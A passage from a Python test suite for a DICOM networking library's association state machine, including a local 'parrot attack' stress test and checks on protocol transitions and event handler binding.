assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta13 + Evt16."""
# Sta13 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_abort),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt16', 'AA-2'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt16'
]
def test_evt17(self):
"""Test Sta13 + Evt17."""
# Sta13 + Evt17 -> AR-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AR-5: Stop ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt17'
]
def test_evt18(self):
"""Test Sta13 + Evt18."""
# Sta13 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt18', 'AA-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta13 + Evt19."""
# Sta13 + Evt19 -> AA-7 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt19', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt19'
]
class TestParrotAttack(TestStateBase):
"""Test a parrot attack on the association."""
def test_requestor(self):
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:14] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
]
def test_acceptor(self):
"""Test hitting the acceptor with PDUs."""
# Also a regression test for #120
# C-ECHO-RQ
# 80 total length
echo_rq = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
# Send associate request then c-echo requests then release request
commands = [
('send', a_associate_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(fsm, scp=None)
scp.shutdown()
assert [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor(object):
"""Functional tests for StateMachine as association requestor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
time.sleep(0.1)
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_monkey_patch(self):
"""Test monkey patching of StateMachine works as intended."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = self.monkey_patch(assoc.dul.state_machine)
assert fsm.current_state == 'Sta1'
fsm.current_state = 'Sta13'
fsm.do_action('Evt3')
assert fsm._changes == [('Sta13', 'Evt3', 'AA-6')]
assert fsm._transitions == ['Sta13']
def test_associate_accept_release(self):
"""Test normal association/release."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_reject(self):
"""Test normal association rejection."""
self.scp = DummyVerificationSCP()
self.scp.ae.require_called_aet = True
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt4', 'AE-4'), # A-ASSOC-RJ PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_abort(self):
"""Test association acceptance then local abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.abort()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection closed
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_local_abort(self):
"""Test association acceptance then local abort if no cx."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.requestor.requested_contexts[0].abstract_syntax = '1.2.3'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
time.sleep(0.1)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection close
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # Connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_peer_abort(self):
"""Test association acceptance then peer abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.network_timeout = 0.5
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
while not self.assoc.is_established:
time.sleep(0.05)
while not self.assoc.is_aborted:
time.sleep(0.05)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt16', 'AA-3'), # A-ABORT-RQ PDV recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_send_data(self):
"""Test association acceptance then send DIMSE message."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.send_c_echo()
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta6',
'Sta6',
'Sta7', # Waitinf for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt9', 'DT-1'), # P-DATA rq primitive
('Sta6', 'Evt10', 'DT-2'), # P-DATA-TF PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_release_AR6(self):
"""Test receive P-DATA-TF while waiting for A-RELEASE-RP."""
# Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
# A-RELEASE-RP
# Patch AR-4 to also send a P-DATA-TF
orig_entry = FINITE_STATE.ACTIONS['AR-4']
def AR_4(dul):
# Send C-ECHO-RQ
dul.socket.send(p_data_tf)
# Normal release response
dul.pdu = A_RELEASE_RP()
dul.pdu.from_primitive(dul.primitive)
# Callback
dul.socket.send(dul.pdu.encode())
dul.artim_timer.start()
return 'Sta13'
# In this case the association acceptor will hit AR_4
FINITE_STATE.ACTIONS['AR-4'] = ('Bluh', AR_4, 'Sta13')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AR-4']= orig_entry
def test_release_AR7(self):
"""Test receive P-DATA primitive after A-RELEASE-RQ PDU."""
orig_entry = FINITE_STATE.ACTIONS['AR-2']
def AR_2(dul):
"""AR-2 occurs when an A-RELEASE-RQ PDU is received."""
# Add P-DATA primitive request
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = VerificationSOPClass
# Send C-ECHO request to the peer via DIMSE and wait for the response
dul.assoc.dimse.send_msg(primitive, 1)
# Normal AR2 response
dul.to_user_queue.put(dul.primitive)
return 'Sta8'
# In this case the association acceptor will hit AR_2
FINITE_STATE.ACTIONS['AR-2'] = ('Bluh', AR_2, 'Sta8')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AR-2']= orig_entry
class TestStateMachineFunctionalAcceptor(object):
"""Functional tests for StateMachine as association acceptor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
time.sleep(0.1)
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_invalid_protocol_version(self):
"""Test receiving an A-ASSOC-RQ with invalid protocol version."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
# Patch AE_2
orig_entry = FINITE_STATE.ACTIONS['AE-2']
def AE_2(dul):
dul.pdu = A_ASSOCIATE_RQ()
dul.pdu.from_primitive(dul.primitive)
dul.pdu.protocol_version = 0x0002
bytestream = dul.pdu.encode()
dul.socket.send(bytestream)
return 'Sta5'
FINITE_STATE.ACTIONS['AE-2'] = ('Bluh', AE_2, 'Sta5')
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.assoc.acceptor.primitive.result == 0x01
assert self.assoc.acceptor.primitive.result_source == 0x02
assert self.assoc.acceptor.primitive.diagnostic == 0x02
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AE-2']= orig_entry
class TestEventHandling(object):
"""Test the FSM event handlers."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_no_handlers(self):
"""Test with no handlers bound."""
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
scp.shutdown()
def test_transition_acceptor(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
assert event.event.name == 'EVT_FSM_TRANSITION'
assert event.event.description == "State machine about to transition"
states = [ee.current_state for ee in triggered]
assert states[:6] == ['Sta1', 'Sta2', 'Sta3', 'Sta6', 'Sta8', 'Sta13']
scp.shutdown()
def test_transition_acceptor_bind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
scp.bind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta6', 'Sta8', 'Sta13']
def test_transition_acceptor_unbind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
scp.unbind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta2', 'Sta3']
scp.shutdown()
def test_transition_requestor(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert assoc.is_established
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:5] == ['Sta1', 'Sta4', 'Sta5', 'Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_bind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.bind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:2] == ['Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_unbind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
